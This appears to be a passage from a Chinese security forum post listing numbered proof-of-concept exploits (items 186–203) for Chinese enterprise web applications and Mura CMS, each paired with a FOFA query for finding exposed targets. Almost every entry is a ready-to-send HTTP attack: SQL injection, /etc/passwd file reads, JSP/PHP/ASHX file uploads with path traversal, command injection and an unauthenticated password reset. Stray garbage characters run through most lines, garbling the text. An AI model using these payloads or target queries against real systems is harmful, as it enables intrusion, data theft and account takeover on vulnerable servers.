1 h8 F) S, ?2 d) Y* K# e8 f. kversion < 7.0.5.1! S8 e- O6 K3 A+ J
FOFA:app="REALOR-天翼应用虚拟化系统", V+ ~; E: ]$ n- z; P9 d
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1$ Z6 c% f) y' T K
Host: host+ o) Z2 R$ ]) ]* ?
# y R# ~5 U2 P/ o4 }% K+ I3 q. F" z. ]$ f& N
186. F-logic DataCube3 SQL注入
6 V" [# ?: X) t2 \CVE-2024-31750
* G1 g- r! h8 Y9 [ t8 a4 D/ ZF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
3 r" L2 U1 Z9 |" N9 eFOFA:title=="DataCube3"4 c6 |) r* j, t/ f: B4 L) @
POST /admin/pr_monitor/getting_index_data.php HTTP/1.15 s' j' y; U( J- W
Host: your-ip
6 P( d) p; A0 F/ M3 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
9 U2 r R( W% L3 e4 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
J2 Q% e2 _( Q2 w& l! y9 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* E/ o5 f5 ~2 ^0 t+ P3 W4 eAccept-Encoding: gzip, deflate) T8 e, G5 j& o2 h5 w& T" i# n
Connection: close) B! Q% f! p; X
Content-Type: application/x-www-form-urlencoded f7 ^- d! H) I# F2 [/ V
" u/ D# S+ m8 Breq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
3 y# B! z2 ? a9 T- N- T+ x: H- \* V0 U, x
7 t9 g9 j1 g) a4 g
187. Mura CMS processAsyncObject SQL注入
|; S) f1 t9 k4 \; S' ~& LCVE-2024-32640
, J' K' H% O- s2 P: ~+ m! [0 D& vFOFA:"Mura CMS", o9 B3 o+ @% [( p9 b! y ?/ g
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.11 y8 g9 E' a5 [# J& l3 _7 Z A8 W
Host: your-ip$ Y) }& K+ Z6 d7 U7 Z0 Z" B
Content-Type: application/x-www-form-urlencoded+ I: s; g6 m# s+ f
; i1 H( s2 y) m8 E4 p* V9 f h! G- x8 C: n$ y8 a% h6 ?$ O
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
0 x$ j4 L' f; i8 S2 A
, T5 E0 ` G; ?
$ M9 L0 n# o$ f- i8 j. k, m, p& r188. 叁体-佳会视频会议 attachment 任意文件读取% }- w7 K8 X. x4 \+ E8 n
version <= 3.9.7+ `' Q e: v+ Q0 o0 c/ p d
FOFA:body="/system/get_rtc_user_defined_info?site_id"
) l$ u8 u' n2 @7 lGET /attachment?file=/etc/passwd HTTP/1.1
& s: @4 U. S2 m' u. H/ fHost: your-ip
8 [' T; ^4 h3 a7 K# p6 E5 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! P; v- j- \. E8 f1 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 i, t! w0 d4 T2 Q3 |# P9 B% t2 RAccept-Encoding: gzip, deflate
2 K) {% I4 ?' `2 b* s$ N* W2 lAccept-Language: zh-CN,zh;q=0.9,en;q=0.8, ?" I# F+ [% S) }4 X0 D% Z8 q
Connection: close
6 ^( c# ?) m* L8 `& Z( e. H4 I6 {' f
3 v; n& w3 j H1 o/ S) q. [$ K* s% B2 o1 U7 g: ^
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
3 a9 Q; F/ s; bFOFA:app="LANWON-临床浏览系统"
1 S# G0 J3 ]$ w% `/ D8 v+ l! y" g1 mGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1. C4 x, [6 h+ ]9 W
Host: your-ip! [0 ~' b2 j$ v2 B% W
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! o+ D2 R2 O. ^. i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 N4 Z( L' f+ W& WAccept-Encoding: gzip, deflate
& _7 i, [& K" O. d5 oAccept-Language: zh-CN,zh;q=0.9
/ S& M5 X$ ~. X# Z1 \2 BConnection: close5 a# M$ V3 `/ r. X. r* }
, M$ F6 L) J8 C7 }- V+ t/ l( U1 L8 p$ z
# u! P/ j% S; S' l5 Z! `2 U190. 短视频矩阵营销系统 poihuoqu 任意文件读取+ m5 _, e! k) s6 l# f
FOFA:title=="短视频矩阵营销系统", V+ b; F0 t# J7 [6 d
POST /index.php/admin/Userinfo/poihuoqu HTTP/29 T, m5 p- X& [2 T, i3 m% t3 Q. {
Host: your-ip
" h; W8 L( Y! u0 i! }" oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.366 p5 x0 {8 R; L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
0 ^, z0 U- D- |# V$ tContent-Type: application/x-www-form-urlencoded; K/ @8 u8 n; F/ K
Accept-Encoding: gzip, deflate
" X! L1 B& y- i' hAccept-Language: zh-CN,zh;q=0.9
$ q7 ^, o ] ^8 o8 D9 W w) _! D) Y% j( x: n% E2 n( e3 s& M
poi=file:///etc/passwd
4 n' w4 H# [+ R9 e3 Y- r0 K9 y
4 t% o9 |5 X. M Y/ o/ [1 g* ]+ n/ V
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入; f6 m# [: Y5 |; N
FOFA:body="/CDGServer3/index.jsp"
9 C+ [9 {& h5 I- G5 NPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
% M. _% C/ Z: j" h3 ^3 E' \+ i0 kHost: your-ip
! i2 V6 t* K/ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 |6 Z! ^" I7 F$ {! C' M; g, j
Content-Type: application/x-www-form-urlencoded
6 O8 I+ @# v+ c* X
6 U3 B9 n9 S1 j+ m6 s# kcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
6 Z$ _& U3 F/ c9 e% m+ y0 x0 r" [1 i2 [' H
5 {+ v3 _. `- |( d4 r: g3 R
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
* J2 n/ I3 q A" K- SFOFA:title="用户登录_富通天下外贸ERP"4 L& C, K1 n) U
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1: N/ m: C0 u% `; {; u- n
Host: your-ip" K( @& c! P# b f8 u% g5 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' A4 j( W/ {- |: m" AContent-Type: application/x-www-form-urlencoded" v5 f) \2 K0 o( K: t
* X) K9 `" s4 _8 M
) o* R2 E% x; M% N/ Z<% @ webhandler language="C#" class="AverageHandler" %>
+ a/ F5 T& o. r% B @5 f) R+ k/ iusing System;
& j/ A) E' O* A4 j& ]using System.Web;
! Z& x; t n9 R v/ z& j( {9 j" opublic class AverageHandler : IHttpHandler5 A5 d+ T+ p$ r; { I. E
{. |5 V1 c- n8 p1 R: m
public bool IsReusable5 E8 O+ S2 l6 p2 T
{ get { return true; } }
; M9 O# `0 C" U4 Ppublic void ProcessRequest(HttpContext ctx)
# F6 V& p; ?* d: @- }# }{
% @: n* d7 J* G0 ]1 {7 t# f6 D4 Uctx.Response.Write("test");
: j' T) V0 R% A. q! {4 P0 {}
; q- q, d( D: k7 h) T, c}
9 H- l8 _1 C2 v0 m0 h( _3 [9 m E! n
~& L8 T, L( C' D/ D- N
5 H% V2 p4 j% L I193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
* c- S8 W6 {3 e" P7 WFOFA:body="山石云鉴主机安全管理系统"* c* u- t% _+ q
GET /master/ajaxActions/getTokenAction.php HTTP/1.1+ X) q( [. H! S( C4 C! w4 H
Host:
7 J' ?& k0 d+ n1 [ q& }; lCookie: PHPSESSID=2333333333333;: p& e( d) B. P8 j2 [0 b' G3 y* u8 ~
Content-Type: application/x-www-form-urlencoded
: K, X' P* C* R& @+ F0 n& kUser-Agent: Mozilla/5.03 N: @' y; x4 |
4 |1 M, H! ~7 `; ]: n* ~; Y( n% r1 M" @
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1/ t6 R$ r7 z( Y, i1 J
Host:
9 ]7 e2 e# Q) `3 { K0 o: VUser-Agent: Mozilla/5.0
1 _9 c+ P4 y4 H; l0 b. YAccept-Encoding: gzip, deflate
' {6 ?! s4 o1 C8 V# [& B t; ~Accept: */* S+ Q0 u! j+ E# z1 |
Connection: close
" S, h9 M8 }' z$ _Cookie: PHPSESSID=2333333333333;3 p! {; S: {5 Q9 W4 M: Q
Content-Type: application/x-www-form-urlencoded+ C( x3 I4 j- E1 t9 B) F
Content-Length: 84& L- N0 t# r* D" U7 E% R
' o$ ?. h3 g: v$ W: P1 Mparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config') l) @( j8 D9 L* Y. k: C8 g
! x0 P) R/ [8 u
* ?7 y i+ g" EGET /master/img/config HTTP/1.1
& r5 P8 ?5 x( I: S$ eHost:
2 `2 d7 |' u8 T7 Y" m1 LUser-Agent: Mozilla/5.0
8 w9 ~/ @7 C8 L/ i& A# v c0 p' A* F4 g" w5 v+ d
; k* d6 ]. u5 }4 x2 k1 b194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传1 K0 A* O+ I2 D0 u, m0 a
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在3 L; Z/ N9 k3 O3 i/ n
, j. y7 L3 k* s$ z* u$ ^( N6 Q
POST /servlet/uploadAttachmentServlet HTTP/1.1
% D1 v) s9 \( z. r7 l. i! r8 IHost: host
, B4 [, n* m, T/ ~# ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36% x' G5 O* t; h$ d+ U4 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ u2 P1 \4 R% V" }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ L, y z; S: z7 u7 FAccept-Encoding: gzip, deflate
/ F' d# L5 ~0 y' l6 C: d- FConnection: close
3 A u6 ?3 P1 f. E/ C' FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
8 t3 a4 V7 T* t------WebKitFormBoundaryKNt0t4vBe8cX9rZk7 t4 w0 F# z9 ?8 N4 ~3 y
+ i7 o( M$ F" E
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
* F' r1 x5 z6 l0 Z+ h: r0 mContent-Type: text/plain1 [7 R5 l, g2 i6 Z* }9 Y
<% out.println("hello");%>
6 I2 ~: z8 b( D5 j------WebKitFormBoundaryKNt0t4vBe8cX9rZk
% `' ]5 i' C; p( ~0 jContent-Disposition: form-data; name="json"7 N0 C& `/ H8 |
{"iq":{"query":{"UpdateType":"mail"}}}4 G) Z8 T8 ^0 T; [5 X; A* n
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--' y& U0 X& P5 k! ^$ b
1 _7 q( w, b3 U- ~0 h( N1 b
: T5 Z' c. p% P4 P/ ~3 R195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
( p8 B V, O& i8 DFOFA:title=="飞鱼星企业级智能上网行为管理系统/ v2 z3 P. U" {0 r
POST /send_order.cgi?parameter=operation HTTP/1.1
1 z# u1 C6 W4 L3 }2 eHost: 127.0.0.1
! C: e6 p& B `2 j t$ u# }Pragma: no-cache, X; @0 s9 u6 S; k; i* K2 s
Cache-Control: no-cache
$ L) i& H" @% T- i) `1 B5 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( R( l5 h- m& T' N4 u, S7 t3 x- T6 fAccept: */*! n+ u4 ?1 q6 S# v# f
Accept-Encoding: gzip, deflate
2 e8 m5 N t9 DAccept-Language: zh-CN,zh;q=0.9
1 a7 K& \, J3 @% O8 DConnection: close
2 [6 `0 X/ c. `+ e d% t: aContent-Type: application/x-www-form-urlencoded
: j0 S- u7 g/ a' M; N6 XContent-Length: 68* d' }3 r/ ?+ G/ V
' g8 ?( b8 T! V0 z
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
@) d+ u- Z4 ^7 i+ `, H) i' W" C- T
# s1 H- Q, n) E$ `' r0 J: h196. 河南省风速科技统一认证平台密码重置
. E5 q/ q+ r1 q, h! n( Y, nFOFA:body="/cas/themes/zbvc/js/jquery.min.js"' ? {* j! y; q7 R; I
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
3 y! d3 ?( u! ]/ S! d# GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 M' U6 i1 T- h1 \0 n/ t' j% H. i w
Content-Type: application/json;charset=UTF-8( i7 O2 ?8 C# T" j
X-Requested-With: XMLHttpRequest
+ n5 e+ M* r) R2 c/ g# ^( THost:5 V) H* r# D4 z0 b& u+ k* p
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.21 a: f" i% p4 M# ~% n+ ^$ S# _
Content-Length: 45
* |5 }/ y! |5 @+ S8 w( J! tConnection: close0 {) n4 c4 x6 p- R
7 u& s: w$ d9 }0 T$ W{"xgh":"test","newPass":"test666","email":""}, P- }1 f+ R2 r" g1 a; O3 ?
) {2 f' F1 e& o. j3 D$ L' U
9 {5 u) K/ q4 F/ z1 N3 s. I! F, l0 q
0 x. Y- y4 F1 [6 B, k) a
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入3 A) @: l7 T3 F. W
FOFA:app="浙大恩特客户资源管理系统"' U1 n; o4 Z0 J0 D5 {/ s% Q
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1+ C+ Q% Y+ a }0 I% A
Host:1 P5 V8 o- E7 A5 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
2 r2 y4 \0 o! Z% Q/ p; TAccept-Encoding: gzip, deflate( O" r) E9 I$ C2 D4 X. s
Connection: close& m( n. H8 A# s# e1 w+ E
( _- @0 `- Z b/ p6 ]+ t. o9 |( F) b$ H" \0 \5 ]3 a
3 O8 S( Q7 n7 Q198. 阿里云盘 WebDAV 命令注入
; h# V; c4 M6 z4 q% v: bCVE-2024-29640
- ?4 y8 w }! h0 |: J4 K' LGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.11 [/ q; }3 u, S. {, D, I; [# B
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
& y9 ~& c) a6 k n$ J1 b. E- h4 yAccept: */*
; Q0 z- u+ B& [1 o) d* cAccept-Encoding: gzip, deflate1 p0 q) b" c. s- x
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6& {) ^+ _4 z) G
Connection: close
8 l1 [9 t1 T8 U' ^ {' O9 P8 x6 m0 |. r' z# N& h
' N+ y4 I, P, [! w" |0 @199. cockpit系统assetsmanager_upload接口 文件上传
- T7 v* o8 x1 Y1 L5 }9 k' u
/ P# n" m" n1 Y" n1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
; @& [2 \/ M) B5 W! Q$ ^GET /auth/login?to=/ HTTP/1.11 H1 N" y1 {4 z7 y& m
, @) f# i+ `4 x2 _
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
4 S8 H" f3 j+ N2 b) ^9 K2 T9 _* f) z0 y
2.使用刚才上一步获取到的jwt获取cookie:
+ J6 b, W \: k7 ^9 Q3 n) D
) ~/ s6 o1 f# H. f3 [/ n/ ePOST /auth/check HTTP/1.12 C6 u. ~: K8 W5 |" e
Content-Type: application/json m+ F# R, s% W. l1 d+ f
- L8 f o. H- @' G" Q/ g
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}7 L: U9 Y' q& W/ ?; h0 N( j
& k$ l& Q2 [( C; `响应:200,返回值:
, m$ ~6 i7 P$ M4 ESet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
" @7 K- W4 M3 ~9 c6 s* K2 lFofa:title="Authenticate Please!"
- t. O# ^ N6 G# |POST /assetsmanager/upload HTTP/1.1
3 }* M- C1 _" z* j3 T: DContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3( j# `! L# t; }' K9 M6 k
Cookie: mysession=95524f01e238bf51bb60d77ede3bea926 {8 _, X) D7 k# V/ s
( s- ]6 R( W$ m% c! j' N K! @0 I
-----------------------------36D28FBc36bd6feE7Fb32 N, Q3 @8 E# u) m
Content-Disposition: form-data; name="files[]"; filename="tttt.php"* ^: b) Y) x" r$ i4 w) c
Content-Type: text/php9 f* Z+ {( U& C2 G1 w! z, @
3 y- x# D, @5 ^8 ?<?php echo "tttt";unlink(__FILE__);?>! {: Q9 I( O& t9 r8 `8 A7 d7 \
-----------------------------36D28FBc36bd6feE7Fb3* G8 I3 Z: \; @ k9 |/ S+ s1 G
Content-Disposition: form-data; name="folder"
5 s& _ s1 Z, h( `; c4 A. W3 \) N+ Q3 m" F% P9 B# X' C
-----------------------------36D28FBc36bd6feE7Fb3--7 i4 U8 f/ ?9 X& c0 E$ P# D+ G
$ f( V, j6 ~# T# t
7 p" i1 u* i* u
/storage/uploads/tttt.php
z- {0 y' A& f C! o: a" K. H3 `/ l1 j' s: X" u
200. SeaCMS海洋影视管理系统dmku SQL注入: q) K+ l) y6 p2 o# ^
FOFA:app="海洋CMS". D, w4 T8 z( \. ^) [; d
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" V/ ^$ N+ k+ o% F Z- Q
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
0 r% u4 G+ ?5 k2 j' |Upgrade-Insecure-Requests: 1
( \" Y0 \" e' b5 UCache-Control: max-age=0
3 X6 H2 ]& e, M8 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! m/ C* }( x: C x- F2 UAccept-Encoding: gzip, deflate" U6 x% e& ?6 d" w, j& d
Accept-Language: zh-CN,zh;q=0.9
$ D- A5 p/ l& r5 ^5 Y0 a1 J0 u1 ~1 ], a9 h3 s: Z0 m& p/ G
8 s) S/ |1 E+ p% C* b5 s) \201. 方正全媒体新闻采编系统 binary SQL注入
+ F" d9 w3 s0 H4 m6 ], FFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"2 B j" s1 t8 j* u, h' E% \
POST /newsedit/newsplan/task/binary.do HTTP/1.1! v# \, z# M t/ \
Content-Type: application/x-www-form-urlencoded
( A+ Z. j" U# x# WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. s( H8 w/ s; S5 Q3 q" PAccept-Encoding: gzip, deflate8 L* T( j) H( g* u1 U
Accept-Language: zh-CN,zh;q=0.9
* F4 k7 h4 n$ W- x3 n/ HConnection: close
4 ~4 Z- t9 ]" y; ~
. c# D" [3 o4 c' O$ r5 aTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
$ B }$ [. _+ r+ ~1 Q2 z2 r4 J, p& D: I" T i3 v: O( ` N( l
! x2 z D# B" ]1 x% \4 d, I202. 微擎系统 AccountEdit任意文件上传
# B5 x) Q, e: C( j9 `1 W% Z1 gFOFA:body="/Widgets/WidgetCollection/"$ {/ O8 ~7 j4 E5 `" C+ W# R6 x! ?5 k
获取__VIEWSTATE和__EVENTVALIDATION值 l# Z' v/ b2 C4 N1 _6 b& n
GET /User/AccountEdit.aspx HTTP/1.1
" q0 ~3 p' [* I! K) ?Host: 滑板人之家
" C* o0 I+ b9 m5 H% AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
2 i, z1 s0 a5 Z oContent-Length: 0+ t+ D0 ~- J5 i) a$ c9 ]9 b5 V
1 ^7 V/ s$ U# H0 \
% l4 x8 Q* O+ Y. u6 l; v& J替换__VIEWSTATE和__EVENTVALIDATION值6 Z) U, x& v+ L0 d
POST /User/AccountEdit.aspx HTTP/1.11 n- K+ j) a. O, w. d1 `' o
Accept-Encoding: gzip, deflate, br( e0 G8 o& E( m! I
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687- l$ i+ ]# m) g+ |7 Z
6 ^/ U; a8 E3 l- a1 @' |8 @8 \
-----------------------------786435874t38587593865736587346567358735687
: w, @2 @9 s& V1 B' b. T3 kContent-Disposition: form-data; name="__VIEWSTATE") Y# O4 e2 H& w7 Z
. p& y: L- J7 M# L' @" @: Z5 d" M5 j__VIEWSTATE
0 W9 |9 c6 d- V( ^8 J" \; z-----------------------------786435874t38587593865736587346567358735687: ~* B4 G- c2 T5 n1 [, [$ ]5 N
Content-Disposition: form-data; name="__EVENTVALIDATION"2 j, q# \0 A9 E" S/ u0 r
8 z0 ^; ?6 ]2 L__EVENTVALIDATION
, _9 Q. v, m. Z6 y! \! |. Q-----------------------------786435874t38587593865736587346567358735687! ?- s1 [ J: x$ R3 O7 ~$ U; G
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
1 W' v4 Q' v' B$ IContent-Type: text/plain
+ a/ o& `1 o0 \: T( C/ n* b- g
^: u( X! p* v$ i( o, yHello World!# h' E6 |" i% Z8 ~
-----------------------------786435874t385875938657365873465673587356873 s3 ^& Y+ b+ j
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
4 I) R p @% ~' c$ O3 p0 i, x( f& Z; \- X+ E3 \
上传图片
& `9 h4 S8 n* N/ v-----------------------------786435874t385875938657365873465673587356874 i k, ?9 o; I4 a2 r* Q2 _ [
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
4 M L" h; B' ?( `
+ C* m( V4 G$ g: a! o
! G# l0 w7 O: y) k2 {' D& C-----------------------------786435874t38587593865736587346567358735687
; C( | f0 ^ NContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
) s$ Q6 @1 `+ H7 v. s! O! M- L7 E7 x( ]6 m
( A. ~6 s; J" I
-----------------------------786435874t38587593865736587346567358735687--% j+ p4 {+ }( @6 S9 M: ~1 t% }
2 L( \5 e ], g
' ]4 S3 @& ^# }- Z- v4 p/_data/Uploads/1123.txt: W% e7 E# g P6 h# y
, ^) f8 }( v" a4 [
203. 红海云EHR PtFjk 文件上传4 }" k& Z& E5 N8 P0 M- X) z
FOFA:body="RedseaPlatform"' _# f" C0 D6 y6 Q
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
; q* d9 z$ L' }$ h4 CHost: x.x.x.x
2 C7 G5 k0 E! C4 l+ _1 p$ z9 M6 ZAccept-Encoding: gzip
4 v0 u8 z: L, v, }* P4 m7 L2 v kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 v' V9 U2 F% S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4( |) ]" o0 z& }5 }* E" a. g t
Content-Length: 210- Q, R1 X4 T) ]1 V1 k
( V% ]+ X: x1 Q; o! @; f------WebKitFormBoundaryt7WbDl1tXogoZys4' ~* y; b1 X \8 B2 Q, j& Z4 X
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
9 o' G: b- [; _) W6 e3 i" ZContent-Type:image/jpeg
9 X1 P8 L5 f" q; c o4 T" a& h4 x
+ L2 b8 x3 Y$ `; [' G<% out.print("hello,eHR");%>
2 ~# q2 z U+ `2 _2 X' @$ F; g. E4 z------WebKitFormBoundaryt7WbDl1tXogoZys4--0 Y+ E3 K4 A: s; f! d- ]
8 J) s7 i2 z& I1 v" C9 X
9 G; d. t' m. M o, b, W. ]
% O) s s* l# i$ h
! H. X4 u, d( O! |' Q; T
$ O$ X7 K; _2 q; B$ O% L& a. O% J: A# v9 n$ ~7 Y
|
发表于 2024-6-5 14:31:29
收藏
支持
反对